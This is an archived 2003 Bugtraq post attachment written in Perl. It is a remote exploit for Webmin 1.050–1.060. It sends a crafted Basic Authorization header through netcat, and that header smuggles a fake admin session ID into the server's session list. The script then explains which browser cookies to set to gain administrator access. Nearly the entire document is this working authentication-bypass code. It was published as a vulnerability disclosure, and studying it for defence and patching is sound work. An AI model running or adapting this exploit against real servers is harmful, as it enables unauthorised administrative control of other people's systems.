91471 2003-02-24  17:04  /40 rader/ Carl Livitt <carl@learningshophull.co.uk>
Bilagans filnamn: "webmin-exploit.pl"
Importerad: 2003-02-24  17:04  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: carl@learningshophull.co.uk
Mottagare: Bugtraq (import) <3622>
Bilaga (text/plain) till text 91470
Ärende: Bilaga (webmin-exploit.pl) till: Webmin 1.050 - 1.060 remote exploit
------------------------------------------------------------
#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";

$nc="/usr/bin/netcat";

if($#ARGV == -1) {
	print "Syntax:\n\t$0 hostname\n";
	exit(1);
}

$hostname=$ARGV[0];

if ( ! -x $nc ) {
	print "netcat not found!\n";
	exit(2);
}

open(NC, "|$nc $hostname 10000 >& /dev/null"); print NC "GET /
HTTP/1.1\n"; print NC "Host: $hostname\n"; print NC "User-agent:
webmin\n"; print NC "Authorization: Basic
YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n"; close(NC);

print "You should now have a session_id of 1234567890 for user
'admin' on host $hostname.\n"; print "Just set two cookies in your
browser:\n\ttesting=1\n\tsid=1234567890\nand you will "; print "be
authenticated to the webmin server!\n\n"; print "Note: This will only
work on a webmin server configured with the 'passdelay' option.\n";
(91471) /Carl Livitt <carl@learningshophull.co.uk>/(Ombruten)